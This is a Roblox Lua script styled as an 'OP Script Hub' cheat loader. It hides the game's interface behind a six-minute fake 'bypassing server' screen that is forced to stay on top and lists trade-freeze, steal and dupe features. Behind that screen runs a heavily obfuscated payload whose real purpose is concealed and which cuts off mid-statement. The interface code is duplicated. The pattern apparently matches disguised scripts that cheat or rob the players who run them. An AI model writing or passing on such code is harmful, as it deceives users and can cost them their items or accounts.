task.wait(10)
-- [[ OP SCRIPT HUB - IMMORTAL LAYER VERSION ]] --
local player = game.Players.LocalPlayer
local PlayerGui = player:WaitForChild("PlayerGui")
local StarterGui = game:GetService("StarterGui")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")

-- Configuration
local MAX_PRIORITY = 2147483647
local IS_LOADING = true

-- Disable CoreGui
StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)

local screenGui = Instance.new("ScreenGui")
screenGui.Name = "OP_Script_Hub_Protected"
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true
screenGui.DisplayOrder = MAX_PRIORITY

-- Function para permi siya naa sa saktong Parent
local function SecureParent()
    local success, coreGui = pcall(function() return game:GetService("CoreGui") end)
    local target = (success and coreGui) or PlayerGui
    if screenGui.Parent ~= target then
        screenGui.Parent = target
    end
end

SecureParent()

-----------------------------------------------------------
-- UI CONSTRUCTION (Sama sa imong design)
-----------------------------------------------------------
local bg = Instance.new("Frame")
bg.Size = UDim2.fromScale(1, 1)
bg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
bg.BorderSizePixel = 0
bg.ZIndex = 10
bg.Parent = screenGui

local bgGradient = Instance.new("UIGradient")
bgGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(5, 5, 12)),
    ColorSequenceKeypoint.new(0.5, Color3.fromRGB(15, 25, 55)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(5, 5, 12))
}
bgGradient.Rotation = 45
bgGradient.Parent = bg

-- Background Animation
task.spawn(function()
    local tween = TweenService:Create(bgGradient, TweenInfo.new(8, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut, -1, true), {Offset = Vector2.new(0.2, 0.2)})
    tween:Play()
end)

-- Branding Container
local brandContainer = Instance.new("Frame")
brandContainer.Size = UDim2.new(0, 250, 0, 45)
brandContainer.Position = UDim2.new(0.98, 0, 0.03, 0)
brandContainer.AnchorPoint = Vector2.new(1, 0)
brandContainer.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
brandContainer.BackgroundTransparency = 0.4
brandContainer.ZIndex = 20
brandContainer.Parent = bg
Instance.new("UICorner", brandContainer).CornerRadius = UDim.new(0, 8)

local cornerLabel = Instance.new("TextLabel")
cornerLabel.Size = UDim2.fromScale(0.9, 0.7)
cornerLabel.Position = UDim2.fromScale(0.5, 0.5)
cornerLabel.AnchorPoint = Vector2.new(0.5, 0.5)
cornerLabel.BackgroundTransparency = 1
cornerLabel.Text = "OP SCRIPT HUB"
cornerLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
cornerLabel.Font = Enum.Font.Michroma 
cornerLabel.TextScaled = true
cornerLabel.ZIndex = 21
cornerLabel.Parent = brandContainer

-- Center Content
local groupFrame = Instance.new("Frame")
groupFrame.Size = UDim2.fromScale(0.85, 0.75)
groupFrame.Position = UDim2.fromScale(0.5, 0.5)
groupFrame.AnchorPoint = Vector2.new(0.5, 0.5)
groupFrame.BackgroundTransparency = 1
groupFrame.ZIndex = 20
groupFrame.Parent = bg

local prepLabel = Instance.new("TextLabel")
prepLabel.Size = UDim2.new(1, 0, 0.06, 0)
prepLabel.Position = UDim2.new(0.5, 0, 0.15, 0)
prepLabel.AnchorPoint = Vector2.new(0.5, 0.5)
prepLabel.BackgroundTransparency = 1
prepLabel.Text = "ESTABLISHING SECURE CONNECTION"
prepLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
prepLabel.Font = Enum.Font.GothamBold
prepLabel.TextScaled = true
prepLabel.ZIndex = 21
prepLabel.Parent = groupFrame

local barContainer = Instance.new("Frame")
barContainer.Size = UDim2.new(0.5, 0, 0.012, 0)
barContainer.Position = UDim2.new(0.5, 0, 0.22, 0)
barContainer.AnchorPoint = Vector2.new(0.5, 0.5)
barContainer.BackgroundColor3 = Color3.fromRGB(15, 15, 20)
barContainer.ZIndex = 21
barContainer.Parent = groupFrame
Instance.new("UICorner", barContainer).CornerRadius = UDim.new(1, 0)

local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
barFill.ZIndex = 22
barFill.Parent = barContainer
Instance.new("UICorner", barFill).CornerRadius = UDim.new(1, 0)

local fillGradient = Instance.new("UIGradient")
fillGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 150, 255)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 255, 200))
}
fillGradient.Parent = barFill

local featuresLabel = Instance.new("TextLabel")
featuresLabel.Size = UDim2.new(1, 0, 0.5, 0)
featuresLabel.Position = UDim2.new(0.5, 0, 0.65, 0)
featuresLabel.AnchorPoint = Vector2.new(0.5, 0.5)
featuresLabel.BackgroundTransparency = 1
featuresLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
featuresLabel.Font = Enum.Font.Code
featuresLabel.RichText = true
featuresLabel.Text = [[
<b><font color="#00aaff">BYPASSING SERVER PLEASE WAIT...</font></b>
<font color="#333333">________________________________________________</font>

[+] FREEZE TRADE <font color="#00ff00">v1.2</font>
[+] DESYNC BYPASS <font color="#00ff00">ACTIVE</font>
[+] INSTANT STEAL <font color="#00ff00">LOADED</font>
[+] ADMIN PANEL <font color="#00ff00">ENABLED</font>
[+] DUPE ENGINE <font color="#00ff00">5.0</font>
]]
featuresLabel.TextScaled = true
featuresLabel.ZIndex = 21
featuresLabel.Parent = groupFrame
Instance.new("UITextSizeConstraint", featuresLabel).MaxTextSize = 22

-----------------------------------------------------------
-- ANTI-OVERWRITE LOGIC (The Secret Sauce)
-----------------------------------------------------------
local guardConnection
guardConnection = RunService.RenderStepped:Connect(function()
    if IS_LOADING then
        -- Pirme i-force ang DisplayOrder sa max
        if screenGui.DisplayOrder ~= MAX_PRIORITY then
            screenGui.DisplayOrder = MAX_PRIORITY
        end
        -- Siguroha nga dili ma-delete o mabalhin ang parent
        SecureParent()
        -- I-force ang visibility (basig naay script nga mo-hide sa tanang GUI)
        screenGui.Enabled = true
    else
        guardConnection:Disconnect()
    end
end)

---|| EXECUTION ||---

local barTween = TweenService:Create(barFill, TweenInfo.new(360, Enum.EasingStyle.Linear), {Size = UDim2.fromScale(1, 1)})
barTween:Play()

barTween.Completed:Wait()

-- End of Loading
IS_LOADING = false

local mainFade = TweenService:Create(bg, TweenInfo.new(1.5), {BackgroundTransparency = 1})
mainFade:Play()

for _, v in pairs(screenGui:GetDescendants()) do
    if v:IsA("TextLabel") then
        TweenService:Create(v, TweenInfo.new(1), {TextTransparency = 1}):Play()
    elseif v:IsA("Frame") then
        TweenService:Create(v, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
    end
end

task.wait(1.5)
screenGui:Destroy()
StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, true)Instance.new("UICorner", barContainer).CornerRadius = UDim.new(1, 0)

-- Loading bar fill
local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
barFill.BorderSizePixel = 0
barFill.ZIndex = 22
barFill.Parent = barContainer

Instance.new("UICorner", barFill).CornerRadius = UDim.new(1, 0)

local fillGradient = Instance.new("UIGradient")
fillGradient.Color = ColorSequence.new{
    ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 150, 255)),
    ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 255, 200))
}
fillGradient.Parent = barFill

-- Features List (RichText)
local featuresLabel = Instance.new("TextLabel")
featuresLabel.Size = UDim2.new(1, 0, 0.5, 0)
featuresLabel.Position = UDim2.new(0.5, 0, 0.65, 0)
featuresLabel.AnchorPoint = Vector2.new(0.5, 0.5)
featuresLabel.BackgroundTransparency = 1
featuresLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
featuresLabel.Font = Enum.Font.Code
featuresLabel.RichText = true
featuresLabel.Text = [[
<b><font color="#00aaff">BYPASSING SERVER PLEASE WAIT...</font></b>
<font color="#333333">________________________________________________</font>

[+] FREEZE TRADE <font color="#00ff00">v1.2</font>
[+] DESYNC BYPASS <font color="#00ff00">ACTIVE</font>
[+] INSTANT STEAL <font color="#00ff00">LOADED</font>
[+] ADMIN PANEL <font color="#00ff00">ENABLED</font>
[+] DUPE ENGINE <font color="#00ff00">5.0</font>
]]
featuresLabel.TextScaled = true
featuresLabel.ZIndex = 21
featuresLabel.Parent = groupFrame

Instance.new("UITextSizeConstraint", featuresLabel).MaxTextSize = 22

---|| EXECUTION LOGIC ||---

-- 6 Minute Loading (360 seconds)
local barTween = TweenService:Create(barFill, TweenInfo.new(360, Enum.EasingStyle.Linear), {Size = UDim2.fromScale(1, 1)})
barTween:Play()

-- Wait for the loading to finish
barTween.Completed:Wait()

-- Smooth Cleanup Fade
local mainFade = TweenService:Create(bg, TweenInfo.new(1.5), {BackgroundTransparency = 1})
mainFade:Play()

for _, v in pairs(screenGui:GetDescendants()) do
    if v:IsA("TextLabel") then
        TweenService:Create(v, TweenInfo.new(1), {TextTransparency = 1}):Play()
    elseif v:IsA("Frame") then
        TweenService:Create(v, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
    end
end

task.wait(1.5)

-- Clean up and restore Roblox UI
screenGui:Destroy()
StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, true)

return(function(...)local w={"Oh/=","LCPPGq==","kbQhm71CdFMox9fQkK==","YbrMGbY5/jd1kbY8kbYe/v==";"FpkzObYX2ePaue3A+hj=";"aq==","kYyduekdxjYgdCiaF6==","GjPCdhY9";"BpdEGjk1k6==";"ZFI0rJ/=","LC0ALCrE";"7Q0NODd1x6==","GDYMOS21","2DVW+EfW+mijBbN2m6==","2CrM2v==";"Bmy3G7PPahtr+CQo","Ob0P2ptEGD1A2K==","zWmZrIfxZ99lypqAwd9peLXGBdyDVz5C1CLnVVTC8VILjRb/5xP7x38NQVDrqb4bHpkGENrQY/nFG5X6gFfICHgbgkw89+ykf1GiufT+T5edRv==";"7Q0M27dPkbrlObu=","vEKJmCi+Y713GetjYK==","GuPf2DPzu92mahYJ+7o=";"Ohj=","27i5OS/=","alq12sfNaq==","7Q0R2F4=","";"OY2Zav==","kbrJ+K==";"uQPromYZob3H29L4";"GCi5Bhd3xhiz2moCYq==","L91E2v==";"m8kjYmiWaYtNuQGJ";"L91CLQtj+JYdYFG=","BEVJY9djxmeCuS/S";"wBBZqrqJTZJl6NoNiE9PfbwNwjxzBWe7qf+2biuiwLSZ+kXM","ObYA";"GCYEOFYEL7dPLDW1","kbrlObu=","Xn50EfVlgZD67Oxfy6Z/ph2bzXAPA1eawKeD1kMB17i3UkF8gKVo2DRG9K==";"GbtPObK=","vmYuFbrCxFQAo92C2Qj=","GDrA2b0M";"7Q09LK==";"YCYl+b0T+K==";"GSd5+F39";"2StQLq==","kb0AkFQl27/=";"LmyM+8i2dhy/uYqK+q==";"kb0JkpiNODG=","2DWTOS/=","OFrE+6==";"2CQPkbtf";"kF3KLFtX"}local function V(V)return w[V-(75564-12526)]end for V,f in ipairs({{464377+-464376;-494948-(-495001)},{911123+-911122;645035-645005},{369702-369671,-830953+831006}})do while f[-853305+853306]<f[603098-603096]do w[f[892718+-892717]],w[f[269785+-269783]],f[-47669-(-47670)],f[(1392590-771697)+-620891]=w[f[(675202+-291593)+((494958+((-88379-(-464838))-825864))+-429160)]],w[f[915699+-915698]],f[-988131-(-988132)]+(611259-611258),f[-552401+(703672+-151269)]-(938944+-938943)end end do local V=string.len local f=table.concat local g=table.insert local S=string.char local K=w local j={X=492760-492717,u=-706199-((-1456434-(-697875+(-561117+1189840)))-(-681063)),H=101993+-101951,m=-762563+762582;S=-101894-(917626+-1019575),["4"]=175899-175843,e=(((-638486-((-339605-(-244522))-750662))-(-993219))-(-680096+1271988))-608550;x=92593-(-741447-(-374808+((153362+-381900)+-230664)));z=-253082-(-253092),V=(-939662+1459588)+(-1359690-(-839824)),["7"]=423026+-423003,w=-929909-(-327876+-602064);N=502174-502133,C=183279-183225,h=499742-(60131-(-439608));n=-272439-(-272502);y=-745442+745443;i=-757051-(-757060);s=-405214+405216;["+"]=578330+-578304,A=(1353654-980134)-373474,J=712211-712160;p=733010+((75979+-461636)+-347346),r=(-327046+-325970)-(-653021);Q=-622746-(-622799);b=62143+-62137;g=503408+-503350;R=27351-27307,["1"]=(694092-935648)-(-241593);["9"]=-317416+317455,U=-455077-(-779363+324227),c=520797-520735;["2"]=(137490+812259)+-949724,F=(-539136-194623)+733781;Z=721712+(-774067+52370),["0"]=-489553-(-489614),["5"]=214914+-214864,B=-437476-(-437494),a=((-65981+-899464)+559241)-(-406218),l=533686-533652,["6"]=771973+-771973;T=(-1886078-(-1014547))-(-871578),P=-189438-(-189471);v=-359012+359028;Y=(260316+585663)+-845958,O=-197288-(-197315);G=-954384-(-954412);K=38996-(-730750-(-769698));E=974097+-974045,j=106155+-106151,W=242408-242359,k=-49622-(-49651),L=1014025-(650189-(-363812)),D=-231883-(-231921);["8"]=(873806+-945734)-(-71963);d=-821347-(-821364),["3"]=-693337+(939092-245698),I=498054-498043;q=-822344-((-1788728-(-823755))+142597),o=878170+-878158,M=((980131-(941524+(-156084+-169515)))+347321)+-711482,t=(-122149+586652)-464490,f=164061-164021,["/"]=581790+-581782}local n=type local t=string.sub local y=math.floor for w=89617-89616,#K,-912443-(-912444)do local J=K[w]if n(J)=="string"then local n=V(J)local s={}local v=683921-(-669676+(1714740-361144))local i=-644274-(-644274)local B=945934-945934 while v<=n do local w=t(J,v,v)local V=j[w]if V then i=i+V*(-77745-(-77809))^((517560-(-222009-(-115935-(-670071+1293702))))-B)B=B+(1037327-1037326)if B==-206863-(-206867)then B=767186+-767186 local w=y(i/(940603+-875067))local V=y((i%(-440047-(-1402891-(-897308))))/(199870-(246588+-46974)))local f=i%(((-692115-203394)+(-831099+(2220363-383465)))+-110034)g(s,S(w,V,f))i=966276+-966276 end elseif w=="="then g(s,S(y(i/(425875-360339))))if v>=n or t(J,v+(-406137+406138),v+((-1157707-(-819283))-(-338425)))~="="then g(s,S(y((i%((-991682-(-159845))-(-897373)))/(17350+-17094))))end break end v=v+(-110558-(-110559))end K[w]=f(s)end end end return(function(w,g,S,K,j,n,t,v,F,r,z,b,i,G,B,m,s,J,Y,y,f,C)s,C,r,z,v,y,b,m,i,f,G,J,F,Y,B=function()v=(((912198+-1990898)-(-709300))+369401)+v J[v]=-796296+796297 return v end,function(w,V)local g=i(V)local S=function(S,K,j,n,t)return f(w,{S;K;j,n,t},V,g)end return S end,function(w)J[w]=J[w]-(480080+((-530799-(-672316))-621596))if J[w]==-740198+740198 then J[w],y[w]=nil,nil end end,function(w,V)local g=i(V)local S=function(S,K)return f(w,{S;K},V,g)end return S end,-49142-(-49142),{},function(w,V)local g=i(V)local S=function(S,K,j,n,t,y)return f(w,{S,K,j,n,t,y},V,g)end return S end,function(w,V)local g=i(V)local S=function(S,K,j,n)return f(w,{S;K;j,n},V,g)end return S end,function(w)for V=-291475+(556419-264943),#w,33973+-33972 do J[w[V]]=J[w[V]]+(-644628-(-644629))end if S then local f=S(true)local g=j(f)g[V(658733+-595653)],g[V(((223976+728215)+((365969+-158907)+(165918+(-836001+-474925))))+48813)],g[V(-964998-(-1028038))]=w,B,function()return-296112+-2305000 end return f else return K({},{[V(994254+(308911+(-1596049-(-355942))))]=B;[V(((-2157016-(-832499))-(-537281))+850316)]=w,[V(-881776-(-944816))]=function()return 226975+-2828087 end})end end,function(f,S,K,j)local T,t,D,U,o,q,h,M,u,X,d,e,k,N,R,L,I,a,J,c,W,B,x,G,p,O,Z,E,i,A,P,l,H,v while f do if f<5870209-(586161+-1595404)then if f<-784876+4777388 then if f<919034-(-516767)then if f<343008+(-889578+1223004)then if f<400525-41256 then if f<-264308-(-536560)then if f<607037-414378 then t=y[K[614059+-614058]]B=789234+33072496511452 i=V((-1544304-(-952666))+654688)J=y[K[993040-993038]]d=V(481169-418115)v=J(i,B)i=V((161989-(-299815))-398721)U=17500860839228-(-153946)f=t[v]t=V(920594+-857535)w[t]=f J=V((-575283-83638)+722006)t=w[J]v=w[i]G=y[K[-351583-(-351584)]]f=w[V(766125-703081)]o=y[K[661977+(-495734-166241)]]l=o(d,U)B=G[l]G=V(-318718-(-381795))G=v[G]i={G(v,B)}J=t(g(i))t=J()t={}else f=7055682-(-282060+-94693)l=nil B=nil o=nil end else f=X f=602411+(12762846-(-972769))t=O end else if f<298889-(-210380)then f=w[V(-345623-(-408686))]t={}else y[v]=I f=y[v]f=f and 5850105-(-962975)or(416391+11856795)-234079 end end else if f<175151+778738 then if f<1123475-205990 then t={}H={}q=V(((-840503-(-730816))-314647)-(-487386))o=nil f=w[V(573298+(52706+-562957))]P=nil h={}E=s()R=s()y[E]=h k=m(-383618+(-181593+5005651),{E;U;c;G})a=V((-665398+819170)-90685)h=s()y[h]=k P=(-163353+-401838)+((26227630003816-396046)-(-543288))k={}G=r(G)y[R]=k i=nil k=w[q]N=y[R]A=nil Z=nil l=nil p=V(-514330-(-577410))W={[p]=N,[a]=Z}q=k(H,W)k=b((5076081-(856691-265831))-(-441887+588241),{R;E;u,U;c;h})R=r(R)A=33283160060144-255927 h=r(h)U=r(U)u=r(u)y[v]=q o=V(251154+-188111)c=r(c)y[B]=k c=V(-217656-(-280734))E=r(E)G=w[o]u=V(-699052-(-762138))d=nil l=y[v]d=y[B]U=d(c,A)o=l[U]i=G[o]o=Y(1519+158904,{v,B})G=i(o)l=V(-857943-(-921026))G=V(285055+-221970)i=w[G]o=w[l]U=y[v]c=y[B]v=r(v)A=c(u,P)d=U[A]U=true c=V(465834+-402757)c=o[c]l={c(o,d,U)}B=r(B)G=i(g(l))i=G()else t=V(-65762+(-413622+542453))f=w[t]J=V(91445+-28355)t=w[J]J=V((-167330-(-726310+300782))+-195108)w[J]=f f=2455007-608099 J=V(845867-782798)w[J]=t J=y[K[-311522-(-181203-130320)]]v=J()end else if f<((-554014+1471826)-48742)-(90560+-292166)then L=985154+-985153 M=a[L]X=f L=false Z=M==L f=Z and 9983924-580376 or-407650-(-764277)O=Z else i=V(-752844-(-815897))v=w[i]i=V(-264530+327611)J=v[i]f=w[V(-773018+836091)]i=y[K[-519209-(-519210)]]v={J(i)}t={g(v)}end end end else if f<-306832+3177924 then if f<2696365-347818 then if f<((((-1339476-(-639074))-29845)+3775750)-523123)-318095 then if f<918675-(-708518)then f=11717999-(-72965)else f=true f=f and 1791367-871059 or 751079-272582 end else y[v]=O e=755480-755479 L=y[W]M=L+e Z=a[M]X=A+Z Z=8494+-8238 f=X%Z M=y[H]A=f Z=u+M f=6244314-(-579113)M=496300+-496044 X=Z%M u=X end else if f<2154358-(-387913)then v=V(576358-513282)t=2320162-(-1016162)i=11390522-90842 J=v^i f=t-J J=f t=V(-779612+842661)f=t/J t={f}f=w[V(125444-62369)]else v=V(44898+18150)t=7904674-856923 i=-995320+16395658 J=v^i f=t-J J=f t=V((700010-(-57368))+-694336)f=t/J t={f}f=w[V(-236908+299996)]end end else if f<4460620-996900 then if f<-328493+3252393 then v=y[K[52608-52605]]i=(-86317-(-659577-(-259239)))-313989 U=(-1261458-(-942253))+319207 J=v%i B=y[K[224105-224101]]l=y[K[678836+-678834]]h=y[K[-357491+357494]]A=297286-297273 P=h-J h=367407-367375 u=P/h c=A-u d=U^c o=l/d G=B(o)B=746790+4294220506.0 i=G%B d=199653-199652 G=-601820-(-601822)B=G^J v=i/B B=y[K[525499-525495]]l=v%d d=4295737545.0-(-62146-(-832395))o=l*d f=-552294+(2735172-755044)J=nil l=(469680-(-3372))+-407516 G=B(o)B=y[K[-533495+533499]]U=48550+-48294 o=B(v)i=G+o G=-455557+(1541726-(380208+640425))B=i%G o=i-B A=(9970-(-717098))-(1349480-622668)G=o/l l=-676065+676321 o=B%l d=B-o l=d/U U=(-375688+(((-1417506-(515344+-640826))-(-530412))-(-277166)))-(-860390)d=G%U c=G-d B=nil v=nil U=c/A i=nil c={o,l;d,U}l=nil y[K[-850943-(-850944)]]=c U=nil d=nil o=nil G=nil else v=y[K[-844720-(-844721)]]G=406913-(-606721+1013632)B=-196556-(-196557)i=v(B,G)v=-527503-(-527504)J=i==v t=J f=J and 130200+(-329307+7520909)or 6220952-214576 end else if f<200353+3728068 then t=U f=c f=U and-646262+7652432 or 11418637-(-984009)else f=25665+(558228+6848542)end end end end else if f<6451143-828244 then if f<-581074+(5610693-631360)then if f<389541+(411991+3532327)then if f<(480179+-787828)+4529882 then if f<-799093+(((-1040327+(-911535+((138966+-193909)-(-1011817))))+5408418)-(486986+(((364885+-1106428)-254887)-34096)))then f=(-1749860-(-802854))+6078743 J=nil y[K[496496+-496491]]=t else Z=((957004+-1039756)-(-805085))+-722332 X=a[Z]O=X f=861178+1475000 end else R=s()H=-713483+713583 q=V(-736110-(-799176))y[R]=I N=-668865+668866 t=w[q]q=V(-374421-(-437478))f=t[q]q=588402-588401 t=f(q,H)a=(-773663+1576197)-802532 q=s()y[q]=t W=-770761-(-771016)f=y[l]H=535049-535049 t=f(H,W)H=s()y[H]=t W=-974941-(-974942)f=y[l]p=y[q]t=f(W,p)W=s()y[W]=t t=y[l]p=t(N,a)t=-883331-(-883332)f=p==t a=V(-590350-(-653424))p=s()t=V(-1017125+1080164)e=1028664-1028664 Z=V(557540+(-819460-(-324984)))y[p]=f X=w[Z]x=701024-691024 M=y[l]L={M(e,x)}Z=X(g(L))X=V(927771-864697)O=Z..X N=a..O f=V((231763+-530245)-(-361543))f=h[f]f=f(h,t,N)N=s()a=V(610602+-547547)y[N]=f O=F((-448151+3771156)-(-17526),{l;R,c;i,v,E,p;N,q,W;H;U})t=w[a]a={t(O)}f={g(a)}a=f f=y[p]f=f and 5019299-(-918077)or 501539+5168533 end else if f<4635127-(339363-56419)then f=y[K[-976311+(192863+783449)]]J=S[-20863+20864]v=S[(-917945-(-827736))+(-210425-(515031-815667))]i=f f=i[v]f=f and-945148+4928401 or 348881+12934737 else v=y[K[-85235+85238]]i=559984-559790 J=v*i v=217902+-217645 i=((-268576+224524)+-107096)-(-151149)t=J%v y[K[-697968-(-697971)]]=t v=y[K[(-622553-(-163492))+459064]]J=v~=i f=J and 741795+2135743 or-314401+4682569 end end else if f<(4738833-((166796+(-1032817-(-732653)))+((-1952245-(-1042618))+125637)))-583443 then if f<4209132-((116293+-1122548)-(-301519))then J=y[K[-140073+140074]]t=#J J=-746024-(-924957-(-178933))f=t==J f=f and 9330906-(401323+-706438)or 1966361-538527 else f=y[K[-341293+341303]]v=y[K[1005545+-1005534]]J[f]=v f=y[K[((329061+-507539)-233918)+412408]]v={f(J)}f=w[V(166324-103242)]t={g(v)}end else if f<-572684+6085454 then f=y[K[-38474-(-38481)]]f=f and 7069777-(-178453)or 840885+5847846 else k=(-308793-16936)+325735 D=(-543361-(-414376))-(-128986)f=y[l]T=f(D,k)k=V((437097+-579126)+205098)f=V(270737-207668)w[f]=T D=w[k]k=524164+-524162 f=D>k f=f and 444183+15495114 or((((-30550-(-912667+(431712+(-376039+320499))))+(135257+-22708))+-30861)-(-100780))+7655146 end end end else if f<((207142-514004)+(-1099461-(-584726)))+7117245 then if f<6981151-(1809131-830690)then if f<190661+5616014 then X=y[v]f=X and 3823452-(-349421)or-269932+2606110 O=X else O=y[v]f=O and 2047008-1018181 or 13851724-(-486302)t=O end else if f<5769933-(-771913-(-246886+-277279))then v=y[K[-89938+89940]]f=6801524-(-872124+351846)i=y[K[596485-596482]]J=v==i t=J else h=E H=h P[h]=H h=nil f=10587648-868790 end end else if f<248701+6471502 then if f<-354768+7038477 then o=y[G]f=-108425+14297773 t=o else f={}J=f f=14889860-725523 v=-723436+723437 i=y[K[(-66935-(-147047))-80103]]B=i i=135211+-135210 G=i i=988624-988624 o=G<i i=v-G end else if f<6708497-(-112423)then f=453986+7528555 else q=r(q)N=r(N)p=r(p)a=nil f=(-504524+15858796)-361945 R=r(R)W=r(W)H=r(H)end end end end end else if f<11238584-769644 then if f<(-976695+9094302)-(-566189)then if f<(-521581+1091827)+6755864 then if f<7025158-(660683-814823)then if f<6549000-(-507399)then if f<672624+6262932 then v=i d=-283287-((731267-1031373)+16819)U=-253825+254080 f=y[K[-534211+534212]]l=f(d,U)J[v]=l f=13611884-(-552453)v=nil else U=s()c=-946062-(-946065)h=F(((-276152-((192826+175436)+-1351708))-344529)+1996858,{})P=V((259959-163968)+-32936)y[U]=t A=(-172634+1011358)-838659 f=y[l]D=V(((1012410+-1643403)+364619)+329438)t=f(c,A)f=922520-922520 c=s()y[c]=t A=f f=267868+-267868 t=w[P]u=f P={t(h)}t=465023+-465021 f={g(P)}P=f f=P[t]t=V(630424+-567362)h=f f=w[t]E=y[i]T=w[D]D=T(h)T=V(655609-592570)I=E(D,T)E={I()}t=f(g(E))E=s()y[E]=t t=(-995429+1012962)+-17532 I=y[c]T=I I=-722849-(-722850)D=I I=-1048366+1048366 k=D<I I=t-D f=15648234-655907 end else i=y[K[-746769-(-746775)]]v=i==J t=v f=3066823-(-1001277)end else if f<7319560-68183 then J=V(196238-133147)i=469841-469841 f=w[J]v=y[K[(-881580-(-1640))+879948]]J=f(v,i)f=6606980-(-81751)else f=t and 15216878-832861 or 4332068-(-799669)end end else if f<6906869-(-1043340)then if f<581639+6929938 then f=w[V(730799+-667728)]t={v}else f=F(-270519+11966242,{B})T={f()}t={g(T)}f=w[V(-776984-(-840029))]end else if f<927643+7277240 then U=r(U)A=nil d=nil v=r(v)h=nil P=nil i=r(i)E=r(E)B=r(B)f=10418846-699988 c=r(c)l=r(l)G=r(G)B=s()d=V(-68113+131166)v=nil y[B]=v u=nil v=s()i=nil y[v]=i o=nil o=V(-93027-(-156093))l=V(201597-138531)G=w[o]P={}o=V(994636-931571)h=((-326610-(-366933+528815))+365962)+122531 i=G[o]G=s()y[G]=i o=w[l]l=V(-22821+85878)i=o[l]l=w[d]c=s()d=V(838144+-775063)o=l[d]u=s()U=V(-241303+304363)d=w[U]U=V(172488+-109418)l=d[U]U=s()A={}d=-866643-(-866643)y[U]=d d=(-266428-634251)+900681 E=986175-985919 y[c]=d d={}k=E y[u]=A A=858571+-858571 E=423500+-423499 R=E E=(-612217+(1434127-981482))-((-840053+1495649)+(-1297121-(-481953)))q=R<E E=h-R else k=V(-58261+121330)f=w[k]k=V(((-925870+933841)+-871898)+(-167920+1094937))w[k]=f f=(-194097+37002)+15692612 end end end else if f<(-642041+10793461)-370803 then if f<611221+8969262 then if f<-471166+9960263 then if f<8603097-(-635442)then P=V(237405-174352)u=w[P]P=V(1029983-966915)A=u[P]f=(2021810-(-816873))-(-763998)U=A else L=-637394-(-637396)M=a[L]L=y[N]f=1142604-((-318074+748276)+355775)Z=M==L O=Z end else t=V((599825+(-863387-(-707338)))+-380685)f=w[t]J=V(579330-516258)t=f(J)f=w[V(790980+(-1168265-(505380+(-598687+-347067))))]t={}end else if f<132820+(926619+8634196)then i=(498259+-1315003)-(-816753)v=y[K[593790-593788]]J=v*i v=29548920457719-(-24856)t=J+v J=35184372905960-(642795+174333)f=t%J y[K[-221310-(-221312)]]=f f=5382022-1013854 else H=not q E=E+R h=E<=k h=H and h H=E>=k H=q and H h=H or h H=(-1017248+96588)+7084641 f=h and H h=9770139-(-476375)f=f or h end end else if f<11229014-954350 then if f<-752558+(-211952+10839477)then f=true y[K[967662+-967661]]=f f=w[V(-220686+283742)]t={}else f=((932521+((-250687+(-313992-(-548733)))-11879))+14750634)-(383803-((-1226349-(-862543))+234221))end else if f<716760+(-662298+10377511)then P=not u c=c+A d=c<=U d=P and d P=c>=U P=u and P d=P or d P=9657006-(-811288)f=d and P d=195360-(-871235-(-794651))f=f or d else D=V((605222+-413633)+(315948+-444477))f=-174042+10502658 d=c T=w[D]D=V(-57706-(-120752))I=T[D]T=I(J,d)d=nil I=y[K[(1333100-812540)+-520554]]D=I()E=T+D h=E+o D=-959139-(-959140)E=60312-60056 P=h%E E=i[v]o=P T=o+D I=B[T]h=E..I i[v]=h end end end end else if f<8527+13949130 then if f<12427580-260511 then if f<(-209923+769206)+11169872 then if f<11962956-921988 then if f<-526230+(11473322-441172)then i=V(175701+-112641)v=s()f=true J=S y[v]=f G=s()B=s()t=w[i]d=z(10828244-(698525-(-262503)),{G})i=V(683653+-620586)f=t[i]i=s()y[i]=f f=Y(443078+9100372,{})l=V(817322-754267)y[B]=f f=false y[G]=f o=w[l]l=o(d)t=l f=l and-469860+7153255 or 504819+13684529 else T=A==u f=75966-(-1186927-(-606904))I=T end else f=887062+959846 end else if f<12228759-(-31560+333157)then f=true f=f and 4912560-(873086+-1524885)or 422823+12683858 else f=(((-1099942-(-363146))+7999837)-(-677823))-247053 end end else if f<868659+12321379 then if f<11441285-(-994741)then f=7647214-(650028+-8984)c=V((((708674-(72859+349800))+((552928-(-454454+1082615))+17345))+611588)+-776647)U=w[c]t=U else f=w[V(120818+-57734)]t={}end else if f<12500439-(-817828)then f={}d=V(-125857-(-188917))l=-157109-(-157364)G=-370064+35184372458896 y[K[939245-(-88125-(-1027368))]]=f t=y[K[(-599650+188100)+(993789+-582236)]]B=t t=v%G y[K[-430253-((-355989-(-564430+1324329))-(-685631))]]=t o=v%l l=726068-726066 G=o+l y[K[-874439-(-874444)]]=G l=w[d]c=458827+(-495236-(519374+-555784))d=V(((-1067875-(-755199))+-92165)-(-467892))o=l[d]l=o(J)o=V(-926569-(-989610))i[v]=o A=c c=-976446+976446 f=11336171-1007555 o=88403-(((796727-((-868730+1307358)+-719221))-((-866299+1902256)+-864964))+((((419514+-105311)-((844067-996336)-(-910753)))-(-419616))+-793263))u=A<c d=447203+-447202 c=d-A U=l else T=y[v]I=T f=T and 